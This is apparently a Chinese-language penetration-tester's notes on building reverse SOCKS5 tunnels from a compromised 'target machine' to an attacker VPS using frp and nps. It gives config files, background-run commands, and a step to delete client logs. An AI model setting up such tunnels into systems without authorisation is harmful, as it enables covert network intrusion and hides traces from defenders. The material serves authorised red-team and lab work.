frp反向socks代理
攻擊機(服務端)
①開啟監聽,frps.ini配置文件
# frp.ini
[common]
bind_port = 7000
token = 寫不寫都行,要一一對應
②開啟監聽
frps.exe -c frps.ini
③proxifier/proxychains
ip 端口 賬號/密碼對應目標機frpc.ini中設置的內容
目標機(防火牆要關掉,客戶端)
①frpc.ini配置文件
[common]
server_addr = 公網vps ip
server_port = 公網vps監聽的端口
token = 對應
use_encryption = true
use_compression = true
[目標系統名]
type = tcp
remote_port = 公網vps中proxifier/proxychains設置的端口(外面的端口)
plugin = socks5
②反向連接
./frpc -c frpc.ini
nohup ./frpc -c conf.txt & / frpc.exe -c conf.txt
nps實現
nps服務端安裝
工具下載地址:https://github.com/ehang-io/nps/releases
挑選服務端下載文件,我這邊用的是win vps,所以選擇windows_amd64_server.tar.gz
上傳到自己的vps,管理員cmd運行nps.exe install
安裝好后
nps.exe start
nps.exe stop
nps.exe restart
nps.exe update
默認使用的是8080端口,注意不要沖突。
服務啟動后就可以在本機訪問vps的ip:port去web管理界面了。
特別注意,安裝好后的nps,配置文件在C:\Program Files\nps\conf\nps.conf
(我一直以為還在nps安裝時的conf文件,修改配置不生效,浪費了好多時間)
主要修改如下配置,至少把管理員賬號密碼改了。
#web
web_host=a.o.com
web_username=admin # 修改
web_password=123 # 修改
web_port = 8080 # 修改
web_ip=0.0.0.0
web_base_url=
web_open_ssl=false
web_cert_file=conf/server.pem
web_key_file=conf/server.key
web管理端配置
ip:port進入web頁面
新建一個客戶端
新建一個socks5代理,客戶端ID對應
點開+號,復制一下客戶端命令
至此web管理端配置完畢
npc客戶端運行代理
執行以下命令進行無配置文件連接,並且后台運行,查看客戶端日志然后刪除
Windows:
npc.exe -server=XXX.XXX.XXX.XXX:8024 -vkey=password -type=tcp
Linux:
nohup ./npc -server=XXX.XXX.XXX.XXX:8024 -vkey=password -type=tcp >> nps.log &
proxifier連接
配置代理規則
檢查測試
成了